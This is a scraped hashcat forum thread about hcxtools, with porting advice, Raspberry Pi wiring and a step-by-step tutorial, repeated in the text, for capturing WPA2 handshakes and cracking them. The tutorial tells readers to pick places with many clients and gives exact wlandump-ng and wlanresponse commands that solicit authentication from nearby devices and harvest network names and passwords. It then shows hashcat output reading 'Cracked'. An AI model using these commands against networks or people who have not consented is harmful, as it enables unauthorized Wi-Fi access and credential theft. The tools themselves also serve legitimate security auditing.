07-22-2017, 06:33 AM
Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65
07-22-2017, 09:36 AM
Hi.
This is only the first fatal error you got. There will be much more...
You will have to find a replacement for linux iwlib.
The Apple Developer Connection website has a lot of articles which talk about porting progs between environments. You'll need to read these first (and similar articles on the Internet) to get a better sense of the issues involved.
"Certainly, it can be done. In fact, it is fairly routine." But it's really too much for a forum-post here.
And from hcxtools READ.me
Requirements: Linux
That's because I'm a very, very lazy coder. That means if there is a library which is able to do the job better than my tools, I'll use this lib.
Maybe a solution:
edit the Makefile
and remove all entries wlandump-ng and wlanresponse (these are extrem hardware-near coded)
then try to compile hcxtools
maybe that works for you
use a raspberry pi A+, B+ to capture
do not use a raspberry pi 3 (wifi soc doesn't work - no monitor mode)
do not use wlandump-ng or wlanresponse on virtual devices like monx (mon0,...)
This is only the first fatal error you got. There will be much more...
You will have to find a replacement for linux iwlib.
The Apple Developer Connection website has a lot of articles which talk about porting progs between environments. You'll need to read these first (and similar articles on the Internet) to get a better sense of the issues involved.
"Certainly, it can be done. In fact, it is fairly routine." But it's really too much for a forum-post here.
And from hcxtools READ.me
Requirements: Linux
That's because I'm a very, very lazy coder. That means if there is a library which is able to do the job better than my tools, I'll use this lib.
Maybe a solution:
edit the Makefile
and remove all entries wlandump-ng and wlanresponse (these are extrem hardware-near coded)
then try to compile hcxtools
maybe that works for you
use a raspberry pi A+, B+ to capture
do not use a raspberry pi 3 (wifi soc doesn't work - no monitor mode)
do not use wlandump-ng or wlanresponse on virtual devices like monx (mon0,...)
07-22-2017, 10:07 AM
basic tutorial about the features to capture passwords from wlantraffic
1.
Choose a place where you do expect to receive many, many clients.
run wlandump-ng or wlanresponse for a while (one or more hours) using this options:
on a notebook
wlandump-ng -i <mywlandevice> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 512 -b -r -l -L -s 20
on a raspberry
wlandump-ng -i <mywlandevice> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 128 -b -r -l -L -s 0
wlanresponse -i <mywlandevice> -o test.cap -t 3 -b -l -L
mydevice is your WLAN device (it must be running allready in monitor mode on a real device - do not use virtual devices like mon0).
Please download and use the attached test.cap for this tutorial [attachment=512]
Extract and copy the cap to a folder and open a terminal inside.
2.
Let's check the cap:
$ wlancapinfo -i test.cap
input file.......: test.cap
magic file number: 0xa1b2c3d4 (cap/pcap)
major version....: 2
minor version....: 4
data link type...: 105 (DLT_IEEE802_11) [https://www.tcpdump.org/linktypes.html]
packets inside...: 6
last pcap error..: flawless
The cap looks like a normal cap, but you should convert it only by using wlancap2hcx, because there are informations inside, other tools are not able to strip.
Let's convert the cap:
$ wlancap2hcx -o test.hccapx -e wordlist test.cap
start reading from test.cap
6 packets processed (6 wlan, 0 lan, 0 loopback)
found 1 wpa2 AES Cipher, HMAC-SHA1
found 1 valid wpa handshake (by wlandump-ng/wlanresponse)
You can see that there's a valid WPA2 handshakles inside and that
wlandump-ng/wlanresponse initiates the authentication with the client.
No accesspint captured - there is no need to capture an accesspoint to get the data!
We use the -e option to save networknames and passwords to a file (it's a good idea to use this option everytime you run wlancap2hcx).
$ ls
test.hccapx test.cap wordlist
now sort our wordlist
$ sort wordlist | uniq > wordlistsort
you need to do this, because there are many dupes inside.
$ ls
test.hccapx test.cap wordlist wordlistsort
now run hashcat
$ hashcat -m 2500 --potfile-path=hc2500.pot test.hccapx wordlistsort
hashcat (v3.6.0-247-g8f2cbb26) starting...
Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA/WPA2
Hash.Target......: UPC501953949 (AP:8c:84:01:09:e9:e6 STA:bc:44:86:a1:66:82)
Time.Started.....: Sat Jul 22 09:59:12 2017 (0 secs)
Time.Estimated...: Sat Jul 22 09:59:12 2017 (0 secs)
Guess.Base.......: File (wordlistsort)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 0 H/s (0.36ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 2/2 (100.00%)
Rejected.........: 0/2 (0.00%)
Restore.Point....: 0/2 (0.00%)
Candidates.#1....: AXNDFNEU -> UPC501953949
HWMon.Dev.#1.....: Temp: 42c Fan: 28% Util:100% Core:1303MHz Mem:3004MHz Bus:8
Take a look into the potfile and you can imagine what's going on.
You cracked the hash, using the captured password from wlantraffic.
It's a good Idea to add/copy/cat the wordlist to your wordlist(s) - everytime you run wlancap2hcx on new cap files.
1.
Choose a place where you do expect to receive many, many clients.
run wlandump-ng or wlanresponse for a while (one or more hours) using this options:
on a notebook
wlandump-ng -i <mywlandevice> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 512 -b -r -l -L -s 20
on a raspberry
wlandump-ng -i <mywlandevice> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 128 -b -r -l -L -s 0
wlanresponse -i <mywlandevice> -o test.cap -t 3 -b -l -L
mydevice is your WLAN device (it must be running allready in monitor mode on a real device - do not use virtual devices like mon0).
Please download and use the attached test.cap for this tutorial [attachment=512]
Extract and copy the cap to a folder and open a terminal inside.
2.
Let's check the cap:
$ wlancapinfo -i test.cap
input file.......: test.cap
magic file number: 0xa1b2c3d4 (cap/pcap)
major version....: 2
minor version....: 4
data link type...: 105 (DLT_IEEE802_11) [https://www.tcpdump.org/linktypes.html]
packets inside...: 6
last pcap error..: flawless
The cap looks like a normal cap, but you should convert it only by using wlancap2hcx, because there are informations inside, other tools are not able to strip.
Let's convert the cap:
$ wlancap2hcx -o test.hccapx -e wordlist test.cap
start reading from test.cap
6 packets processed (6 wlan, 0 lan, 0 loopback)
found 1 wpa2 AES Cipher, HMAC-SHA1
found 1 valid wpa handshake (by wlandump-ng/wlanresponse)
You can see that there's a valid WPA2 handshakles inside and that
wlandump-ng/wlanresponse initiates the authentication with the client.
No accesspint captured - there is no need to capture an accesspoint to get the data!
We use the -e option to save networknames and passwords to a file (it's a good idea to use this option everytime you run wlancap2hcx).
$ ls
test.hccapx test.cap wordlist
now sort our wordlist
$ sort wordlist | uniq > wordlistsort
you need to do this, because there are many dupes inside.
$ ls
test.hccapx test.cap wordlist wordlistsort
now run hashcat
$ hashcat -m 2500 --potfile-path=hc2500.pot test.hccapx wordlistsort
hashcat (v3.6.0-247-g8f2cbb26) starting...
Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA/WPA2
Hash.Target......: UPC501953949 (AP:8c:84:01:09:e9:e6 STA:bc:44:86:a1:66:82)
Time.Started.....: Sat Jul 22 09:59:12 2017 (0 secs)
Time.Estimated...: Sat Jul 22 09:59:12 2017 (0 secs)
Guess.Base.......: File (wordlistsort)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 0 H/s (0.36ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 2/2 (100.00%)
Rejected.........: 0/2 (0.00%)
Restore.Point....: 0/2 (0.00%)
Candidates.#1....: AXNDFNEU -> UPC501953949
HWMon.Dev.#1.....: Temp: 42c Fan: 28% Util:100% Core:1303MHz Mem:3004MHz Bus:8
Take a look into the potfile and you can imagine what's going on.
You cracked the hash, using the captured password from wlantraffic.
It's a good Idea to add/copy/cat the wordlist to your wordlist(s) - everytime you run wlancap2hcx on new cap files.
07-22-2017, 03:01 PM
(07-22-2017, 09:36 AM)ZerBea Wrote: [ -> ]Hi.
This is only the first fatal error you got. There will be much more...
You will have to find a replacement for linux iwlib.
The Apple Developer Connection website has a lot of articles which talk about porting progs between environments. You'll need to read these first (and similar articles on the Internet) to get a better sense of the issues involved.
"Certainly, it can be done. In fact, it is fairly routine." But it's really too much for a forum-post here.
And from hcxtools READ.me
Requirements: Linux
That's because I'm a very, very lazy coder. That means if there is a library which is able to do the job better than my tools, I'll use this lib.
Maybe a solution:
edit the Makefile
and remove all entries wlandump-ng and wlanresponse (these are extrem hadware-near coded)
then try to compile hcxtools
maybe that works for you
use a raspberry pi A+, B+ to capture
do not use a raspberry pi 3 (wifi soc doesn't work - no monitor mode)
do not use wlandump-ng or wlanresponse on virtual devices like monx (mon0,...)
Ok, I will have a try. Thanks anyway.
07-22-2017, 08:03 PM
Well, let's see how it works.
How about hcxkeys. Are you able to compile them?
How about hcxkeys. Are you able to compile them?
07-23-2017, 02:36 PM
(07-22-2017, 06:33 AM)QYQ Wrote: [ -> ]I have a problem when make install, there is no <linux/wireless.h> file
my sys is mac os sierra 10.12.6
how can I find the losing file
thanks.
Run an Ubuntu VM in VMware Fusion. Works very well.
You will need to use a supported USB WiFi adapter but you would want to do that anyway.
08-03-2017, 08:38 AM
Read more about the authentication process and the importance of the message M2 here:
https://hashcat.net/forum/thread-6745-po...l#pid36007
https://hashcat.net/forum/thread-6745-po...l#pid36007
08-04-2017, 07:24 PM
Can you post up a clear GPIO pin out and what is needed for the Hardware mod. I would assume a switch and a couple LED's. but a pinout explanation would be nice.
Thanks,
Winxp
Thanks,
Winxp
08-04-2017, 08:07 PM
Circuit:
https://github.com/ZerBea/hcxtools/blob/...iowait.odg
Parts:
1 x LED, Low-Current (Kingbright 2.2 V, 2 mA)
1 x Resistor 10k Ohms
1 x Resistor 330 Ohms
1 Push Button
20cm cable
GPIO pin pin GPIO
-------------------------------------
3V3 1 5V
1/3 (SCL) 6 0V
4 7 14 (TXD)
17 (ce1) 11 18 (ce0)
Basic turorial how to "wiringpi"
https://www.sunfounder.com/forum/how-to-...ry-pi/?p=1
https://github.com/ZerBea/hcxtools/blob/...iowait.odg
Parts:
1 x LED, Low-Current (Kingbright 2.2 V, 2 mA)
1 x Resistor 10k Ohms
1 x Resistor 330 Ohms
1 Push Button
20cm cable
GPIO pin pin GPIO
-------------------------------------
3V3 1 5V
1/3 (SCL) 6 0V
4 7 14 (TXD)
17 (ce1) 11 18 (ce0)
Basic turorial how to "wiringpi"
https://www.sunfounder.com/forum/how-to-...ry-pi/?p=1
08-04-2017, 10:02 PM
Thanks, much obliged.